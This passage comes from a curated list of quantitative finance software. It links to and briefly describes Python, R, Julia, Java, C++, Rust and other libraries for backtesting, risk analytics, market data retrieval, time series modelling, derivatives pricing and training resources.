[nautilus_trader](https://github.com/nautechsystems/nautilus_trader) - A high-performance algorithmic trading platform and event-driven backtester. - [YABTE](https://github.com/bsdz/yabte) - Yet Another (Python) BackTesting Engine. ### Risk Analysis - [QuantLibRisks](https://github.com/auto-differentiation/QuantLib-Risks-Py) - Fast risks with QuantLib - [XAD](https://github.com/auto-differentiation/xad-py) - Automatic Differentation (AAD) Library - [pyfolio](https://github.com/quantopian/pyfolio) - Portfolio and risk analytics in Python. - [empyrical](https://github.com/quantopian/empyrical) - Common financial risk and performance metrics. - [fecon235](https://github.com/rsvp/fecon235) - Computational tools for financial economics include: Gaussian Mixture model of leptokurtotic risk, adaptive Boltzmann portfolios. - [finance](https://pypi.org/project/finance/) - Financial Risk Calculations. Optimized for ease of use through class construction and operator overload. - [qfrm](https://pypi.org/project/qfrm/) - Quantitative Financial Risk Management: awesome OOP tools for measuring, managing and visualizing risk of financial instruments and portfolios. - [visualize-wealth](https://github.com/benjaminmgross/visualize-wealth) - Portfolio construction and quantitative analysis. - [VisualPortfolio](https://github.com/wegamekinglc/VisualPortfolio) - This tool is used to visualize the performance of a portfolio. - [universal-portfolios](https://github.com/Marigold/universal-portfolios) - Collection of algorithms for online portfolio selection. - [FinQuant](https://github.com/fmilthaler/FinQuant) - A program for financial portfolio management, analysis and optimization. - [Empyrial](https://github.com/ssantoshp/Empyrial) - Portfolio's risk and performance analytics and returns predictions. - [risktools](https://github.com/bbcho/risktools-dev) - Risk tools for use within the crude and crude products trading space with partial implementation of R's PerformanceAnalytics. - [Riskfolio-Lib](https://github.com/dcajasn/Riskfolio-Lib) - Portfolio Optimization and Quantitative Strategic Asset Allocation in Python. - [empyrical-reloaded](https://github.com/stefan-jansen/empyrical-reloaded) - Common financial risk and performance metrics. [empyrical](https://github.com/quantopian/empyrical) fork. - [pyfolio-reloaded](https://github.com/stefan-jansen/pyfolio-reloaded) - Portfolio and risk analytics in Python. [pyfolio](https://github.com/quantopian/pyfolio) fork. - [fortitudo.tech](https://github.com/fortitudo-tech/fortitudo.tech) - Conditional Value-at-Risk (CVaR) portfolio optimization and Entropy Pooling views / stress-testing in Python. ### Factor Analysis - [alphalens](https://github.com/quantopian/alphalens) - Performance analysis of predictive alpha factors. - [Spectre](https://github.com/Heerozh/spectre) - GPU-accelerated Factors analysis library and Backtester ### Sentiment Analysis - [Asset News Sentiment Analyzer](https://github.com/KVignesh122/AssetNewsSentimentAnalyzer) - Sentiment analysis and report generation package for financial assets and securities utilizing GPT models. ### Quant Research Environment - [Jupyter Quant](https://github.com/gnzsnz/jupyter-quant) - A dockerized Jupyter quant research environment with preloaded tools for quant analysis, statsmodels, pymc, arch, py_vollib, zipline-reloaded, PyPortfolioOpt, etc. ### Time Series - [ARCH](https://github.com/bashtage/arch) - ARCH models in Python. - [statsmodels](http://statsmodels.sourceforge.net) - Python module that allows users to explore data, estimate statistical models, and perform statistical tests. - [dynts](https://github.com/quantmind/dynts) - Python package for timeseries analysis and manipulation. - [PyFlux](https://github.com/RJT1990/pyflux) - Python library for timeseries modelling and inference (frequentist and Bayesian) on models. - [tsfresh](https://github.com/blue-yonder/tsfresh) - Automatic extraction of relevant features from time series. - [hasura/quandl-metabase](https://platform.hasura.io/hub/projects/anirudhm/quandl-metabase-time-series) - Hasura quickstart to visualize Quandl's timeseries datasets with Metabase. - [Facebook Prophet](https://github.com/facebook/prophet) - Tool for producing high quality forecasts for time series data that has multiple seasonality with linear or non-linear growth. - [tsmoothie](https://github.com/cerlymarco/tsmoothie) - A python library for time-series smoothing and outlier detection in a vectorized way. - [pmdarima](https://github.com/alkaline-ml/pmdarima) - A statistical library designed to fill the void in Python's time series analysis capabilities, including the equivalent of R's auto.arima function. - [gluon-ts](https://github.com/awslabs/gluon-ts) - vProbabilistic time series modeling in Python. ### Calendars - [exchange_calendars](https://github.com/gerrymanoim/exchange_calendars) - Stock Exchange Trading Calendars. - [bizdays](https://github.com/wilsonfreitas/python-bizdays) - Business days calculations and utilities. - [pandas_market_calendars](https://github.com/rsheftel/pandas_market_calendars) - Exchange calendars to use with pandas for trading applications. ### Data Sources - [yfinance](https://github.com/ranaroussi/yfinance) - Yahoo! Finance market data downloader (+faster Pandas Datareader) - [findatapy](https://github.com/cuemacro/findatapy) - Python library to download market data via Bloomberg, Quandl, Yahoo etc. - [googlefinance](https://github.com/hongtaocai/googlefinance) - Python module to get real-time stock data from Google Finance API. - [yahoo-finance](https://github.com/lukaszbanasiak/yahoo-finance) - Python module to get stock data from Yahoo! Finance. - [pandas-datareader](https://github.com/pydata/pandas-datareader) - Python module to get data from various sources (Google Finance, Yahoo Finance, FRED, OECD, Fama/French, World Bank, Eurostat...) into Pandas datastructures such as DataFrame, Panel with a caching mechanism. - [pandas-finance](https://github.com/davidastephens/pandas-finance) - High level API for access to and analysis of financial data. - [pyhoofinance](https://github.com/innes213/pyhoofinance) - Rapidly queries Yahoo Finance for multiple tickers and returns typed data for analysis. - [yfinanceapi](https://github.com/Karthik005/yfinanceapi) - Finance API for Python. - [yql-finance](https://github.com/slawek87/yql-finance) - yql-finance is simple and fast. API returns stock closing prices for current period of time and current stock ticker (i.e. APPL, GOOGL). - [ystockquote](https://github.com/cgoldberg/ystockquote) - Retrieve stock quote data from Yahoo Finance. - [wallstreet](https://github.com/mcdallas/wallstreet) - Real time stock and option data. - [stock_extractor](https://github.com/ZachLiuGIS/stock_extractor) - General Purpose Stock Extractors from Online Resources. - [Stockex](https://github.com/cttn/Stockex) - Python wrapper for Yahoo! Finance API. - [finsymbols](https://github.com/skillachie/finsymbols) - Obtains stock symbols and relating information for SP500, AMEX, NYSE, and NASDAQ. - [FRB](https://github.com/avelkoski/FRB) - Python Client for FRED® API. - [inquisitor](https://github.com/econdb/inquisitor) - Python Interface to Econdb.com API. - [yfi](https://github.com/nickelkr/yfi) - Yahoo! YQL library. - [chinesestockapi](https://pypi.org/project/chinesestockapi/) - Python API to get Chinese stock price. - [exchange](https://github.com/akarat/exchange) - Get current exchange rate. - [ticks](https://github.com/jamescnowell/ticks) - Simple command line tool to get stock ticker data. - [pybbg](https://github.com/bpsmith/pybbg) - Python interface to Bloomberg COM APIs. - [ccy](https://github.com/lsbardel/ccy) - Python module for currencies. - [tushare](https://pypi.org/project/tushare/) - A utility for crawling historical and Real-time Quotes data of China stocks. - [jsm](https://pypi.org/project/jsm/) - Get the japanese stock market data. - [cn_stock_src](https://github.com/jealous/cn_stock_src) - Utility for retrieving basic China stock data from different sources. - [coinmarketcap](https://github.com/barnumbirr/coinmarketcap) - Python API for coinmarketcap. - [after-hours](https://github.com/datawrestler/after-hours) - Obtain pre market and after hours stock prices for a given symbol. - [bronto-python](https://pypi.org/project/bronto-python/) - Bronto API Integration for Python. - [pytdx](https://github.com/rainx/pytdx) - Python Interface for retrieving chinese stock realtime quote data from TongDaXin Nodes. - [pdblp](https://github.com/matthewgilbert/pdblp) - A simple interface to integrate pandas and the Bloomberg Open API. - [tiingo](https://github.com/hydrosquall/tiingo-python) - Python interface for daily composite prices/OHLC/Volume + Real-time News Feeds, powered by the Tiingo Data Platform. - [iexfinance](https://github.com/addisonlynch/iexfinance) - Python Interface for retrieving real-time and historical prices and equities data from The Investor's Exchange. - [pyEX](https://github.com/timkpaine/pyEX) - Python interface to IEX with emphasis on pandas, support for streaming data, premium data, points data (economic, rates, commodities), and technical indicators. - [alpaca-trade-api](https://github.com/alpacahq/alpaca-trade-api-python) - Python interface for retrieving real-time and historical prices from Alpaca API as well as trade execution. - [metatrader5](https://pypi.org/project/MetaTrader5/) - API Connector to MetaTrader 5 Terminal - [akshare](https://github.com/jindaxiang/akshare) - AkShare is an elegant and simple financial data interface library for Python, built for human beings! <https://akshare.readthedocs.io> - [yahooquery](https://github.com/dpguthrie/yahooquery) - Python interface for retrieving data through unofficial Yahoo Finance API. - [investpy](https://github.com/alvarobartt/investpy) - Financial Data Extraction from Investing.com with Python! <https://investpy.readthedocs.io/> - [yliveticker](https://github.com/yahoofinancelive/yliveticker) - Live stream of market data from Yahoo Finance websocket. - [bbgbridge](https://github.com/ran404/bbgbridge) - Easy to use Bloomberg Desktop API wrapper for Python. - [alpha_vantage](https://github.com/RomelTorres/alpha_vantage) - A python wrapper for Alpha Vantage API for financial data. - [FinanceDataReader](https://github.com/FinanceData/FinanceDataReader) - Open Source Financial data reader for U.S, Korean, Japanese, Chinese, Vietnamese Stocks - [pystlouisfed](https://github.com/TomasKoutek/pystlouisfed) - Python client for Federal Reserve Bank of St. Louis API - FRED, ALFRED, GeoFRED and FRASER. - [python-bcb](https://github.com/wilsonfreitas/python-bcb) - Python interface to Brazilian Central Bank web services. - [market-prices](https://github.com/maread99/market_prices) - Create meaningful OHLCV datasets from knowledge of [exchange-calendars](https://github.com/gerrymanoim/exchange_calendars) (works out-the-box with data from Yahoo Finance). - [tardis-python](https://github.com/tardis-dev/tardis-python) - Python interface for Tardis.dev high frequency crypto market data - [lake-api](https://github.com/crypto-lake/lake-api) - Python interface for Crypto Lake high frequency crypto market data - [tessa](https://github.com/ymyke/tessa) - simple, hassle-free access to price information of financial assets (currently based on yfinance and pycoingecko), including search and a symbol class. - [pandaSDMX](https://github.com/dr-leo/pandaSDMX) - Python package that implements SDMX 2.1 (ISO 17369:2013), a format for exchange of statistical data and metadata used by national statistical agencies, central banks, and international organisations. - [cif](https://github.com/LenkaV/CIF) - Python package that include few composite indicators, which summarize multidimensional relationships between individual economic indicators. - [finagg](https://github.com/theOGognf/finagg) - finagg is a Python package that provides implementations of popular and free financial APIs, tools for aggregating historical data from those APIs into SQL databases, and tools for transforming aggregated data into features useful for analysis and AI/ML. - [FinanceDatabase](https://github.com/JerBouma/FinanceDatabase) - This is a database of 300.000+ symbols containing Equities, ETFs, Funds, Indices, Currencies, Cryptocurrencies and Money Markets. ### Excel Integration - [xlwings](https://www.xlwings.org/) - Make Excel fly with Python. - [openpyxl](https://openpyxl.readthedocs.io/en/latest/) - Read/Write Excel 2007 xlsx/xlsm files. - [xlrd](https://github.com/python-excel/xlrd) - Library for developers to extract data from Microsoft Excel spreadsheet files. - [xlsxwriter](https://xlsxwriter.readthedocs.io/) - Write files in the Excel 2007+ XLSX file format. - [xlwt](https://github.com/python-excel/xlwt) - Library to create spreadsheet files compatible with MS Excel 97/2000/XP/2003 XLS files, on any platform. - [DataNitro](https://datanitro.com/) - DataNitro also offers full-featured Python-Excel integration, including UDFs. Trial downloads are available, but users must purchase a license. - [xlloop](http://xlloop.sourceforge.net) - XLLoop is an open source framework for implementing Excel user-defined functions (UDFs) on a centralised server (a function server). - [expy](http://www.bnikolic.co.uk/expy/expy.html) - The ExPy add-in allows easy use of Python directly from within an Microsoft Excel spreadsheet, both to execute arbitrary code and to define new Excel functions. - [pyxll](https://www.pyxll.com) - PyXLL is an Excel add-in that enables you to extend Excel using nothing but Python code. ### Visualization - [D-Tale](https://github.com/man-group/dtale) - Visualizer for pandas dataframes and xarray datasets. - [mplfinance](https://github.com/matplotlib/mplfinance) - matplotlib utilities for the visualization, and visual analysis, of financial data. - [finplot](https://github.com/highfestiva/finplot) - Performant and effortless finance plotting for Python. - [finvizfinance](https://github.com/lit26/finvizfinance) - Finviz analysis python library. - [market-analy](https://github.com/maread99/market_analy) - Analysis and interactive charting using [market-prices](https://github.com/maread99/market_prices) and bqplot. ## R ### Numerical Libraries & Data Structures - [xts](https://github.com/joshuaulrich/xts) - eXtensible Time Series: Provide for uniform handling of R's different time-based data classes by extending zoo, maximizing native format information preservation and allowing for user level customization and extension, while simplifying cross-class interoperability. - [data.table](https://github.com/Rdatatable/data.table) - Extension of data.frame: Fast aggregation of large data (e.g. 100GB in RAM), fast ordered joins, fast add/modify/delete of columns by group using no copies at all, list columns and a fast file reader (fread). Offers a natural and flexible syntax, for faster development. - [sparseEigen](https://github.com/dppalomar/sparseEigen) - Sparse principal component analysis. - [TSdbi](http://tsdbi.r-forge.r-project.org/) - Provides a common interface to time series databases. - [tseries](https://cran.r-project.org/web/packages/tseries/index.html) - Time Series Analysis and Computational Finance. - [zoo](https://cran.r-project.org/web/packages/zoo/index.html) - S3 Infrastructure for Regular and Irregular Time Series (Z's Ordered Observations). - [tis](https://cran.r-project.org/web/packages/tis/index.html) - Functions and S3 classes for time indexes and time indexed series, which are compatible with FAME frequencies. - [tfplot](https://cran.r-project.org/web/packages/tfplot/index.html) - Utilities for simple manipulation and quick plotting of time series data. - [tframe](https://cran.r-project.org/web/packages/tframe/index.html) - A kernel of functions for programming time series methods in a way that is relatively independently of the representation of time. ### Data Sources - [IBrokers](https://cran.r-project.org/web/packages/IBrokers/index.html) - Provides native R access to Interactive Brokers Trader Workstation API. - [Rblpapi](https://github.com/Rblp/Rblpapi) - An R Interface to 'Bloomberg' is provided via the 'Blp API'. - [Quandl](https://www.quandl.com/tools/r) - Get Financial Data Directly Into R. - [Rbitcoin](https://github.com/jangorecki/Rbitcoin) - Unified markets API interface (bitstamp, kraken, btce, bitmarket). - [GetTDData](https://github.com/msperlin/GetTDData) - Downloads and aggregates data for Brazilian government issued bonds directly from the website of Tesouro Direto. - [GetHFData](https://github.com/msperlin/GetHFData) - Downloads and aggregates high frequency trading data for Brazilian instruments directly from Bovespa ftp site. - [Reddit WallstreetBets API](https://dashboard.nbshare.io/apps/reddit/api/) - Provides daily top 50 stocks from reddit (subreddit) Wallstreetbets and their sentiments via the API. - [td](https://github.com/eddelbuettel/td) - Interfaces the 'twelvedata' API for stocks and (digital and standard) currencies. - [rbcb](https://github.com/wilsonfreitas/rbcb) - R interface to Brazilian Central Bank web services. - [rb3](https://github.com/ropensci/rb3) - A bunch of downloaders and parsers for data delivered from B3. - [simfinapi](https://github.com/matthiasgomolka/simfinapi) - Makes 'SimFin' data (<https://simfin.com/>) easily accessible in R. ### Financial Instruments and Pricing - [RQuantLib](https://github.com/eddelbuettel/rquantlib) - RQuantLib connects GNU R with QuantLib. - [quantmod](https://cran.r-project.org/web/packages/quantmod/index.html) - Quantitative Financial Modelling Framework. - [Rmetrics](https://www.rmetrics.org) - The premier open source software solution for teaching and training quantitative finance. - [fAsianOptions](https://cran.r-project.org/web/packages/fAsianOptions/index.html) - EBM and Asian Option Valuation. - [fAssets](https://cran.r-project.org/web/packages/fAssets/index.html) - Analysing and Modelling Financial Assets. - [fBasics](https://cran.r-project.org/web/packages/fBasics/index.html) - Markets and Basic Statistics. - [fBonds](https://cran.r-project.org/web/packages/fBonds/index.html) - Bonds and Interest Rate Models. - [fExoticOptions](https://cran.r-project.org/web/packages/fExoticOptions/index.html) - Exotic Option Valuation. - [fOptions](https://cran.r-project.org/web/packages/fOptions/index.html) - Pricing and Evaluating Basic Options. - [fPortfolio](https://cran.r-project.org/web/packages/fPortfolio/index.html) - Portfolio Selection and Optimization. - [portfolio](https://github.com/dgerlanc/portfolio) - Analysing equity portfolios. - [sparseIndexTracking](https://github.com/dppalomar/sparseIndexTracking) - Portfolio design to track an index. - [covFactorModel](https://github.com/dppalomar/covFactorModel) - Covariance matrix estimation via factor models. - [riskParityPortfolio](https://github.com/dppalomar/riskParityPortfolio) - Blazingly fast design of risk parity portfolios. - [sde](https://cran.r-project.org/web/packages/sde/index.html) - Simulation and Inference for Stochastic Differential Equations. - [YieldCurve](https://cran.r-project.org/web/packages/YieldCurve/index.html) - Modelling and estimation of the yield curve. - [SmithWilsonYieldCurve](https://cran.r-project.org/web/packages/SmithWilsonYieldCurve/index.html) - Constructs a yield curve by the Smith-Wilson method from a table of LIBOR and SWAP rates. - [ycinterextra](https://cran.r-project.org/web/packages/ycinterextra/index.html) - Yield curve or zero-coupon prices interpolation and extrapolation. - [AmericanCallOpt](https://cran.r-project.org/web/packages/AmericanCallOpt/index.html) - This package includes pricing function for selected American call options with underlying assets that generate payouts. - [VarSwapPrice](https://cran.r-project.org/web/packages/VarSwapPrice/index.html) - Pricing a variance swap on an equity index. - [RND](https://cran.r-project.org/web/packages/RND/index.html) - Risk Neutral Density Extraction Package. - [LSMonteCarlo](https://cran.r-project.org/web/packages/LSMonteCarlo/index.html) - American options pricing with Least Squares Monte Carlo method. - [OptHedging](https://cran.r-project.org/web/packages/OptHedging/index.html) - Estimation of value and hedging strategy of call and put options. - [tvm](https://cran.r-project.org/web/packages/tvm/index.html) - Time Value of Money Functions. - [OptionPricing](https://cran.r-project.org/web/packages/OptionPricing/index.html) - Option Pricing with Efficient Simulation Algorithms. - [credule](https://github.com/blenezet/credule) - Credit Default Swap Functions. - [derivmkts](https://cran.r-project.org/web/packages/derivmkts/index.html) - Functions and R Code to Accompany Derivatives Markets. - [FinCal](https://github.com/felixfan/FinCal) - Package for time value of money calculation, time series analysis and computational finance. - [r-quant](https://github.com/artyyouth/r-quant) - R code for quantitative analysis in finance. - [options.studies](https://github.com/taylorizing/options.studies) - options trading studies functions for use with options.data package and shiny. - [PortfolioAnalytics](https://github.com/braverock/PortfolioAnalytics) - Portfolio Analysis, Including Numerical Methods for Optimizationof Portfolios. - [fmbasics](https://github.com/imanuelcostigan/fmbasics) - Financial Market Building Blocks. - [R-fixedincome](https://github.com/wilsonfreitas/R-fixedincome) - Fixed income tools for R. ### Trading - [backtest](https://cran.r-project.org/web/packages/backtest/index.html) - Exploring Portfolio-Based Conjectures About Financial Instruments. - [pa](https://cran.r-project.org/web/packages/pa/index.html) - Performance Attribution for Equity Portfolios. - [TTR](https://github.com/joshuaulrich/TTR) - Technical Trading Rules. - [QuantTools](https://quanttools.bitbucket.io/_site/index.html) - Enhanced Quantitative Trading Modelling. - [blotter](https://github.com/braverock/blotter) - Transaction infrastructure for defining instruments, transactions, portfolios and accounts for trading systems and simulation. Provides portfolio support for multi-asset class and multi-currency portfolios. Actively maintained and developed. ### Backtesting - [quantstrat](https://github.com/braverock/quantstrat) - Transaction-oriented infrastructure for constructing trading systems and simulation. Provides support for multi-asset class and multi-currency portfolios for backtesting and other financial research. ### Risk Analysis - [PerformanceAnalytics](https://github.com/braverock/PerformanceAnalytics) - Econometric tools for performance and risk analysis. ### Factor Analysis - [FactorAnalytics](https://github.com/braverock/FactorAnalytics) - The FactorAnalytics package contains fitting and analysis methods for the three main types of factor models used in conjunction with portfolio construction, optimization and risk management, namely fundamental factor models, time series factor models and statistical factor models. - [Expected Returns](https://github.com/JustinMShea/ExpectedReturns) - Solutions for enhancing portfolio diversification and replications of seminal papers with R, most of which are discussed in one of the best investment references of the recent decade, Expected Returns: An Investors Guide to Harvesting Market Rewards by Antti Ilmanen. ### Time Series - [tseries](https://cran.r-project.org/web/packages/tseries/index.html) - Time Series Analysis and Computational Finance. - [fGarch](https://cran.r-project.org/web/packages/fGarch/index.html) - Rmetrics - Autoregressive Conditional Heteroskedastic Modelling. - [timeSeries](https://cran.r-project.org/web/packages/timeSeries/index.html) - Rmetrics - Financial Time Series Objects. - [rugarch](https://github.com/alexiosg/rugarch) - Univariate GARCH Models. - [rmgarch](https://github.com/alexiosg/rmgarch) - Multivariate GARCH Models. - [tidypredict](https://github.com/edgararuiz/tidypredict) - Run predictions inside the database <https://tidypredict.netlify.com/>. - [tidyquant](https://github.com/business-science/tidyquant) - Bringing financial analysis to the tidyverse. - [timetk](https://github.com/business-science/timetk) - A toolkit for working with time series in R. - [tibbletime](https://github.com/business-science/tibbletime) - Built on top of the tidyverse, tibbletime is an extension that allows for the creation of time aware tibbles through the setting of a time index. - [matrixprofile](https://github.com/matrix-profile-foundation/matrixprofile) - Time series data mining library built on top of the novel Matrix Profile data structure and algorithms. - [garchmodels](https://github.com/AlbertoAlmuinha/garchmodels) - A parsnip backend for GARCH models. ### Calendars - [timeDate](https://cran.r-project.org/web/packages/timeDate/index.html) - Chronological and Calendar Objects - [bizdays](https://github.com/wilsonfreitas/R-bizdays) - Business days calculations and utilities ## Matlab ### FrameWorks - [QUANTAXIS](https://github.com/yutiansut/quantaxis) - Integrated Quantitative Toolbox with Matlab. ## Julia - [Lucky.jl](https://github.com/oliviermilla/Lucky.jl) - Modular, asynchronous trading engine in pure Julia. - [QuantLib.jl](https://github.com/pazzo83/QuantLib.jl) - Quantlib implementation in pure Julia. - [Ito.jl](https://github.com/aviks/Ito.jl) - A Julia package for quantitative finance. - [TALib.jl](https://github.com/femtotrader/TALib.jl) - A Julia wrapper for TA-Lib. - [IncTA.jl](https://github.com/femtotrader/IncTA.jl) - Julia Incremental Technical Analysis Indicators - [Miletus.jl](https://github.com/JuliaComputing/Miletus.jl) - A financial contract definition, modeling language, and valuation framework. - [Temporal.jl](https://github.com/dysonance/Temporal.jl) - Flexible and efficient time series class & methods. - [Indicators.jl](https://github.com/dysonance/Indicators.jl) - Financial market technical analysis & indicators on top of Temporal. - [Strategems.jl](https://github.com/dysonance/Strategems.jl) - Quantitative systematic trading strategy development and backtesting. - [TimeSeries.jl](https://github.com/JuliaStats/TimeSeries.jl) - Time series toolkit for Julia. - [MarketTechnicals.jl](https://github.com/JuliaQuant/MarketTechnicals.jl) - Technical analysis of financial time series on top of TimeSeries. - [MarketData.jl](https://github.com/JuliaQuant/MarketData.jl) - Time series market data. - [TimeFrames.jl](https://github.com/femtotrader/TimeFrames.jl) - A Julia library that defines TimeFrame (essentially for resampling TimeSeries). - [DataFrames.jl](https://github.com/JuliaData/DataFrames.jl) - In-memory tabular data in Julia - [TSFrames.jl](https://github.com/xKDR/TSFrames.jl) - Handle timeseries data on top of the powerful and mature DataFrames.jl ## Java - [Strata](http://strata.opengamma.io/) - Modern open-source analytics and market risk library designed and written in Java. - [JQuantLib](https://github.com/frgomes/jquantlib) - JQuantLib is a free, open-source, comprehensive framework for quantitative finance, written in 100% Java. - [finmath.net](http://finmath.net) - Java library with algorithms and methodologies related to mathematical finance. - [quantcomponents](https://github.com/lsgro/quantcomponents) - Free Java components for Quantitative Finance and Algorithmic Trading. - [DRIP](https://lakshmidrip.github.io/DRIP) - Fixed Income, Asset Allocation, Transaction Cost Analysis, XVA Metrics Libraries. - [ta4j](https://github.com/ta4j/ta4j) - A Java library for technical analysis. ## JavaScript - [finance.js](https://github.com/ebradyjobory/finance.js) - A JavaScript library for common financial calculations. - [portfolio-allocation](https://github.com/lequant40/portfolio_allocation_js) - PortfolioAllocation is a JavaScript library designed to help constructing financial portfolios made of several assets: bonds, commodities, cryptocurrencies, currencies, exchange traded funds (ETFs), mutual funds, stocks... - [Ghostfolio](https://github.com/ghostfolio/ghostfolio) - Wealth management software to keep track of financial assets like stocks, ETFs or cryptocurrencies and make solid, data-driven investment decisions. - [IndicatorTS](https://github.com/cinar/indicatorts) - Indicator is a TypeScript module providing various stock technical analysis indicators, strategies, and a backtest framework for trading. - [ccxt](https://github.com/ccxt/ccxt) - A JavaScript / Python / PHP cryptocurrency trading API with support for more than 100 bitcoin/altcoin exchanges. - [PENDAX](https://github.com/CompendiumFi/PENDAX-SDK) - Javascript SDK for Trading/Data API and Websockets for FTX, FTXUS, OKX, Bybit, & More. ### Data Visualization - [QUANTAXIS_Webkit](https://github.com/yutiansut/QUANTAXIS_Webkit) - An awesome visualization center based on quantaxis. ## Haskell - [quantfin](https://github.com/boundedvariation/quantfin) - quant finance in pure haskell. - [Haxcel](https://github.com/MarcusRainbow/Haxcel) - Excel Addin for Haskell. - [Ffinar](https://github.com/MarcusRainbow/Ffinar) - A financial maths library in Haskell. ## Scala - [QuantScale](https://github.com/choucrifahed/quantscale) - Scala Quantitative Finance Library. - [Scala Quant](https://github.com/frankcash/Scala-Quant) - Scala library for working with stock data from IFTTT recipes or Google Finance. ## Ruby - [Jiji](https://github.com/unageanu/jiji2) - Open Source Forex algorithmic trading framework using OANDA REST API. ## Elixir/Erlang - [Tai](https://github.com/fremantle-capital/tai) - Open Source composable, real time, market data and trade execution toolkit. - [Workbench](https://github.com/fremantle-industries/workbench) - From Idea to Execution - Manage your trading operation across a globally distributed cluster - [Prop](https://github.com/fremantle-industries/prop) - An open and opinionated trading platform using productive & familiar open source libraries and tools for strategy research, execution and operation. ## Golang - [Kelp](https://github.com/stellar/kelp) - Kelp is an open-source Golang algorithmic cryptocurrency trading bot that runs on centralized exchanges and Stellar DEX (command-line usage and desktop GUI). - [marketstore](https://github.com/alpacahq/marketstore) - DataFrame Server for Financial Timeseries Data. - [IndicatorGo](https://github.com/cinar/indicator) - IndicatorGo is a Golang module providing various stock technical analysis indicators, strategies, and a backtest framework for trading. ## CPP - [QuantLib](https://github.com/lballabio/QuantLib) - The QuantLib project is aimed at providing a comprehensive software framework for quantitative finance. - [QuantLibRisks](https://github.com/auto-differentiation/QuantLib-Risks-Cpp) - Fast risks with QuantLib in C++ - [XAD](https://github.com/auto-differentiation/xad) - Automatic Differentation (AAD) Library - [TradeFrame](https://github.com/rburkholder/trade-frame) - C++ 17 based framework/library (with sample applications) for testing options based automated trading ideas using DTN IQ real time data feed and Interactive Brokers (TWS API) for trade execution. Comes with built-in [Option Greeks/IV](https://github.com/rburkholder/trade-frame/tree/master/lib/TFOptions) calculation library. ## Frameworks - [QuantLib](https://github.com/lballabio/QuantLib) - The QuantLib project is aimed at providing a comprehensive software framework for quantitative finance. - QuantLibRisks - Fast risks with QuantLib in [Python](https://pypi.org/project/QuantLib-Risks/) and [C++](https://github.com/auto-differentiation/QuantLib-Risks-Cpp) - XAD - Automatic Differentiation (AAD) Library in [Python](https://pypi.org/project/xad/) and [C++](https://github.com/auto-differentiation/xad/) - [JQuantLib](https://github.com/frgomes/jquantlib) - Java port. - [RQuantLib](https://github.com/eddelbuettel/rquantlib) - R port. - [QuantLibAddin](https://www.quantlib.org/quantlibaddin/) - Excel support. - [QuantLibXL](https://www.quantlib.org/quantlibxl/) - Excel support. - [QLNet](https://github.com/amaggiulli/qlnet) - .Net port. - [PyQL](https://github.com/enthought/pyql) - Python port. - [QuantLib.jl](https://github.com/pazzo83/QuantLib.jl) - Julia port. - [QuantLib-Python Documentation](https://quantlib-python-docs.readthedocs.io/) - Documentation for the Python bindings for the QuantLib library - [TA-Lib](https://ta-lib.org) - perform technical analysis of financial market data. - [ta-lib-python](https://github.com/TA-Lib/ta-lib-python) - [ta-lib](https://github.com/TA-Lib/ta-lib) - [Portfolio Optimizer](https://portfoliooptimizer.io/) - Portfolio Optimizer is a Web API for portfolio analysis and optimization. - XAD: Automatic Differentation (AAD) Library for [Python](https://pypi.org/project/xad/) and [C++](https://github.com/auto-differentiation/xad) ## CSharp - [QuantConnect](https://github.com/QuantConnect/Lean) - Lean Engine is an open-source fully managed C# algorithmic trading engine built for desktop and cloud usage. - [StockSharp](https://github.com/StockSharp/StockSharp) - Algorithmic trading and quantitative trading open source platform to develop trading robots (stock markets, forex, crypto, bitcoins, and options). - [TDAmeritrade.DotNetCore](https://github.com/NVentimiglia/TDAmeritrade.DotNetCore) - Free, open-source .NET Client for the TD Ameritrade Trading Platform. Helps developers integrate TD Ameritrade API into custom trading solutions. ## Rust - [QuantMath](https://github.com/MarcusRainbow/QuantMath) - Financial maths library for risk-neutral pricing and risk - [Barter](https://github.com/barter-rs/barter-rs) - Open-source Rust framework for building event-driven live-trading & backtesting systems - [LFEST](https://github.com/MathisWellmann/lfest-rs) - Simulated perpetual futures exchange to trade your strategy against. - [TradeAggregation](https://github.com/MathisWellmann/trade_aggregation-rs) - Aggregate trades into user-defined candles using information driven rules. - [SlidingFeatures](https://github.com/MathisWellmann/sliding_features-rs) - Chainable tree-like sliding windows for signal processing and technical analysis. - [RustQuant](https://github.com/avhz/RustQuant) - Quantitative finance library written in Rust. - [finalytics](https://github.com/Nnamdi-sys/finalytics) - A rust library for financial data analysis. ## Reproducing Works, Training & Books - [Auto-Differentiation Website](https://auto-differentiation.github.io/) - Background and resources on Automatic Differentiation (AD) / Adjoint Algorithmic Differentitation (AAD). - [Derman Papers](https://github.com/MarcosCarreira/DermanPapers) - Notebooks that replicate original quantitative finance papers from Emanuel Derman. - [ML-Quant](https://www.ml-quant.com/) - Top Quant resources like ArXiv (sanity), SSRN, RePec, Journals, Podcasts, Videos, and Blogs. - [volatility-trading](https://github.com/jasonstrimpel/volatility-trading) - A complete set of volatility estimators based on Euan Sinclair's Volatility Trading. - [quant](https://github.com/paulperry/quant) - Quantitative Finance and Algorithmic Trading exhaust; mostly ipython notebooks based on Quantopian, Zipline, or Pandas. - [fecon235](https://github.com/rsvp/fecon235) - Open source project for software tools in financial economics. Many jupyter notebook to verify theoretical ideas and practical methods interactively. - [Quantitative-Notebooks](https://github.com/LongOnly/Quantitative-Notebooks) - Educational notebooks on quantitative finance, algorithmic trading, financial modelling and investment strategy - [QuantEcon](https://quantecon.org/) - Lecture series on economics, finance, econometrics and data science; QuantEcon.py, QuantEcon.jl, notebooks - [FinanceHub](https://github.com/Finance-Hub/FinanceHub) - Resources for Quantitative Finance - [Python_Option_Pricing](https://github.com/dedwards25/Python_Option_Pricing) - An library to price financial options written in Python. Includes: Black Scholes, Black 76, Implied Volatility, American, European, Asian, Spread Options. - [python-training](https://github.com/jpmorganchase/python-training) - J.P. Morgan's Python training for business analysts and traders. - [Stock_Analysis_For_Quant](https://github.com/LastAncientOne/Stock_Analysis_For_Quant) - Different Types of Stock Analysis in Excel, Matlab, Power BI, Python, R, and Tableau. - [algorithmic-trading-with-python](https://github.com/chrisconlan/algorithmic-trading-with-python) - Source code for Algorithmic Trading with Python (2020) by Chris Conlan. - [MEDIUM_NoteBook](https://github.com/cerlymarco/MEDIUM_NoteBook) - Repository containing notebooks of [cerlymarco](https://github.com/cerlymarco)'s posts on Medium. - [QuantFinance](https://github.com/PythonCharmers/QuantFinance) - Training materials in quantitative finance. - [IPythonScripts](https://github.com/mgroncki/IPythonScripts) - Tutorials about Quantitative Finance in Python and QuantLib: Pricing, xVAs, Hedging, Portfolio Optimisation, Machine Learning and Deep Learning. - [Computational-Finance-Course](https://github.com/LechGrzelak/Computational-Finance-Course) 